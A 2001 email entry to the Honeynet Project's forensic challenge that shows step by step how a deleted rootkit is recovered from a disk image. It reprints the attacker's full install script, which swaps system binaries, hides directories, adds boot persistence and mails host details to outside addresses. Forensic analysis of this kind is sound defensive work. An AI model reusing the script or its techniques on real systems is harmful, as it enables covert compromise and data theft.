From alex.butcher@integralis.com Tue May 22 22:36:56 2001 Date: Thu, 3 May 2001 18:31:33 +0100 (BST) From: Alex Butcher To: project@honeynet.org Subject: ENTRY: May Scan of the Month Hi - Here's my entry for Honeynet's May 2001 Scan of the Month : 1. Show step by step how you identify and recover the deleted rootkit from the / partition. First, I mounted the dd image read-only using Linux's loopback filesystem: mount -o ro,loop honeypot.hda8.dd /honeyroot Having a look around the filesystem, I noticed a directory '/dev/ida/.. ' which is a typically named hax0r's hidden directory (to an inexperienced sysadmin, it'll just look like a parent directory). Also in /dev/ida was .drag-on which also caught my attention. I listed the contents of these directories: ========================================================================= % ls -AlR '.. ' .drag-on/ .. : total 646 -rwx------ 1 root root 7165 Mar 16 01:45 linsniffer -rwx------ 1 root root 75 Mar 16 01:45 logclear -rwxr-xr-x 1 root root 632066 Mar 16 01:45 mkxfs -rw-r--r-- 1 root root 708 Mar 16 01:45 s -rwxr-xr-x 1 root root 4060 Mar 16 01:45 sense -rwx------ 1 root root 8268 Mar 16 01:45 sl2 -rw------- 1 root root 540 Mar 16 01:45 ssh_host_key -rw------- 1 root root 512 Mar 16 01:45 ssh_random_seed -rw-r--r-- 1 root root 0 Mar 16 01:45 tcp.log .drag-on/: total 647 -rwx------ 1 root root 7165 Mar 16 01:45 linsniffer -rwx------ 1 root root 75 Mar 16 01:45 logclear -rwxr-xr-x 1 root root 632066 Mar 16 01:45 mkxfs -rw-r--r-- 1 root root 708 Mar 16 01:45 s -rwxr-xr-x 1 root root 4060 Mar 16 01:45 sense -rwx------ 1 root root 8268 Mar 16 01:45 sl2 -rw------- 1 root root 540 Mar 16 01:45 ssh_host_key -rw------- 1 root root 512 Mar 16 14:45 ssh_random_seed -rw-r--r-- 1 root root 138 Mar 16 16:28 tcp.log ========================================================================= Ah-ha, yes, definitely useful back-door tools for an intruder; a sniffer, a tool to put some order in logs generated by the sniffer and a copy of ssh (named mkxfs) and keys, and what appears to be a scanner of some sort (sl2). To take the bonus question first, it would certainly appear that the rootkit WAS installed on the system. We've even captured at least part of it. Next, I ran lazarus from The Coroner's Toolkit (tct) by Dan Farmer and Wietse Venema (many thanks to both of them for such a useful set of tools!) lazarus took a long time to run and I kept running out of disc space, so I kept having a look around the stuff it had found in the blocks/ directory. One of the files it recovered was 9086.p.txt containing an installation script for the rootkit: ========================================================================= #!/bin/sh clear unset HISTFILE echo "********* Instalarea Rootkitului A Pornit La Drum *********" echo "********* Mircea SUGI PULA ********************************" echo "********* Multumiri La Toti Care M-Au Ajutat **************" echo "********* Lemme Give You A Tip : **************************" echo "********* Ignore everything, call your freedom ************" echo "********* Scream & swear as much as you can ***************" echo "********* Cuz anyway nobody will hear you and no one will *" echo "********* Care about you **********************************" echo echo chown root.root * if [ -f /usr/bin/make ]; then echo "Are Make !" else echo "Nu Are Make !" fi if [ -f /usr/bin/gcc ]; then echo "Are Gcc !" else echo "Nu Are Gcc !" fi if [ -f /usr/sbin/sshd/ ]; then echo "Are Ssh !" else echo "Nu Are Ssh !" fi echo -n "* Inlocuim nestat ... alea alea " rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top cp -f mkxfs /usr/sbin/ echo "* Gata..." echo -n "* Dev... " echo echo touch /dev/rpm >/dev/rpm echo "3 sl2" >>/dev/rpm echo "3 sshdu" >>/dev/rpm echo "3 linsniffer" >>/dev/rpm echo "3 smurf" >>/dev/rpm echo "3 slice" >>/dev/rpm echo "3 mech" >>/dev/rpm echo "3 muh" >>/dev/rpm echo "3 bnc" >>/dev/rpm echo "3 psybnc" >> /dev/rpm touch /dev/last >/dev/last echo "1 193.231.139" >>/dev/last echo "1 213.154.137" >>/dev/last echo "1 193.254.34" >>/dev/last echo "3 48744" >>/dev/last echo "3 3666" >>/dev/last echo "3 31221" >>/dev/last echo "3 22546" >>/dev/last echo "4 48744" >>/dev/last echo "4 2222" >>/dev/last echo "* Gata" echo "* Facem Director...Si Mutam Alea.. " mkdir -p /dev/ida/.drag-on mkdir -p /dev/ida/".. " echo "* Copiem ssh si alea" cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/ cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. " rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed touch /dev/ida/.drag-on/tcp.log touch /dev/ida/".. "/tcp.log cp -f inetd.conf /etc cp -f services /etc killall -HUP inetd echo echo echo echo "* Adaugam In Startup:) ..." rm -rf /usr/bin/lsattr echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit cp -f lsattr /usr/bin/ chmod 500 /usr/bin/lsattr chattr +i /usr/bin/lsattr /usr/bin/lsattr sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f last.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f last.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f last.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f last.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f last.cgi /www/cgi-bin/ fi echo "* Luam Informatiile dorite ..." echo "* Info : $(uname -a)" >> computer echo "* Hostname : $(hostname -f)" >> computer echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer echo "* Uptime : $(uptime)" >> computer echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer echo "* Spatiu Liber: $(df -h)" >> computer echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog " cat computer | mail -s "placinte" last@linuxmail.org cat computer | mail -s "roote" bidi_damm@yahoo.com echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ." echo echo echo "* G A T A *" echo echo "* That Was Nice Last " cd / rm -rf last lk.tgz computer lk.tar.gz ========================================================================= Hmmm... from the language, it would appear to be a Romanian blackhat's rootkit. Checking /etc/rc.d/rc.sysinit in our loopback-mounted filesystem, we see that it has been modified to run lsattr. The rootkit has *definitely* been installed by the intruder. Looking through the files that lazarus has recovered, we can even learn the spec of the system from the file it mailed the two addresses (90418.m.txt) by grepping for 'IfConfig' over the entire set of files: ========================================================================= To: bidi_damm@yahoo.com Subject: roote * Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown * Hostname : asdf1 * IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0 * Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00 * Cpu Vendor ID : vendor_id : GenuineIntel * Cpu Model : model : 4 model name : Pentium MMX * Cpu Speed: cpu MHz : 200.457171 * Bogomips: bogomips : 399.77 * Spatiu Liber: Filesystem Size Used Avail Use% Mounted on /dev/hda8 251M 33M 205M 14% / /dev/hda1 23M 2.4M 19M 11% /boot /dev/hda6 1.6G 2.1M 1.5G 0% /home /dev/hda5 1.6G 367M 1.2G 23% /usr /dev/hda7 251M 5.3M 232M 2% /var ========================================================================= We also know a likely name for the rootkit now; lk.tgz. Using ils from tct I obtained a listing of removed files: ========================================================================= % ./bin/ils -r honeypot.hda8.dd class|host|device|start_time ils|alex.integralis.co.uk|/dosc/honeynet/honeypot.hda8.dd|988909862 st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|st_nlink|st_size|st_block0|st_block1 23|f|0|0|984706608|984707090|984707105|984707105|100644|0|520333|307|308 ... ========================================================================= using icat from tct I started extracting removed files one at a time from the dd image by supplying the inode number: ========================================================================= % ./bin/icat honeypot.hda8.dd 23 >23.txt ========================================================================= Running file on 23.txt identified it as gzip compressed data. gunzipping the data and running file on the result identified it as a GNU tar archive. Running tar -tvf on that file gave a listing of the contents and the answer to question 2. 2. What files make up the deleted rootkit? ========================================================================= % tar -tvf 23 drwxr-xr-x 1031/users 0 2001-02-26 20:40:30 last/ tar: Archive contains future timestamp 2002-02-08 13:08:13 -rwxr-xr-x 1031/users 611931 2002-02-08 13:08:13 last/ssh -rw-r--r-- 1031/users 1 2001-02-26 15:29:58 last/pidfile -rwx------ 1031/users 3713 2001-03-03 03:08:37 last/install -rwx------ 1031/users 7165 2001-02-26 15:22:50 last/linsniffer -rwxr-xr-x 1031/users 1345 1999-09-09 16:57:11 last/cleaner -rw-r--r-- 1031/users 3278 2001-01-27 15:11:32 last/inetd.conf -rwxr-xr-x 1031/users 79 2001-02-26 15:28:40 last/lsattr -rw-r--r-- 1031/users 11407 2001-01-27 15:11:44 last/services -rwxr-xr-x 1031/users 4060 2001-02-26 15:22:55 last/sense -rw-r--r-- 1031/users 880 2000-10-22 20:29:44 last/ssh_config -rw------- 1031/users 540 2000-10-22 20:29:44 last/ssh_host_key -rw-r--r-- 1031/users 344 2000-10-22 20:29:44 last/ssh_host_key.pub -rw------- 1031/users 512 2000-10-22 20:29:44 last/ssh_random_seed -rw-r--r-- 1031/users 688 2001-02-26 15:29:51 last/sshd_config -rwx------ 1031/users 8268 2001-02-26 15:22:59 last/sl2 -rwxr-xr-x 1031/users 4620 2001-02-26 15:23:10 last/last.cgi -rwxr-xr-x 1031/users 33280 2001-02-26 15:23:33 last/ps -rwxr-xr-x 1031/users 35300 2001-02-26 15:23:42 last/netstat -rwxr-xr-x 1031/users 19840 2001-02-26 15:23:47 last/ifconfig -rwxr-xr-x 1031/users 53588 2001-02-26 15:23:55 last/top -rwx------ 1031/users 75 2001-02-26 15:24:03 last/logclear -rw-r--r-- root/root 708 2001-03-03 03:05:12 last/s -rwxr-xr-x 1031/users 632066 2001-02-26 14:46:04 last/mkxfs ========================================================================= Yup, that'll be the rootkit alright! Best Regards, Alex. -- Alex Butcher PGP/GnuPG Key IDs: Consultant, S3 Systems Security Services alex@s3 B7709088 PGP: http://www.s3.integralis.co.uk/pgp/alex.pgp alex.butcher@ 885BA6CE Integralis Theale House Brunel Road Theale, Reading RG7 4AQ +44 (0) 118 9306060 A member of the Articon-Integralis Group info@Integralis.com http://www.integralis.com DISCLAIMER Any opinions expressed in this email are those of the individual and not necessarily the Company. This email and any files transmitted with it, including replies and forwarded copies (which may contain alterations) subsequently transmitted from the Company, are confidential and solely for the use of the intended recipient. It may contain material protected by attorney-client privilege. If you are not the intended recipient or the person responsible for delivering to the intended recipient, be advised that you have received this email in error and that any use is strictly prohibited. If you have received this email in error please notify the IT manager by telephone on +44 (0)118 930 6060 or via email to internal.security@integralis.com, including a copy of this message. Please then delete this email and destroy any copies of it. [ Part 2, "" Application/X-GZIP 716KB. ] [ Unable to print this part. ]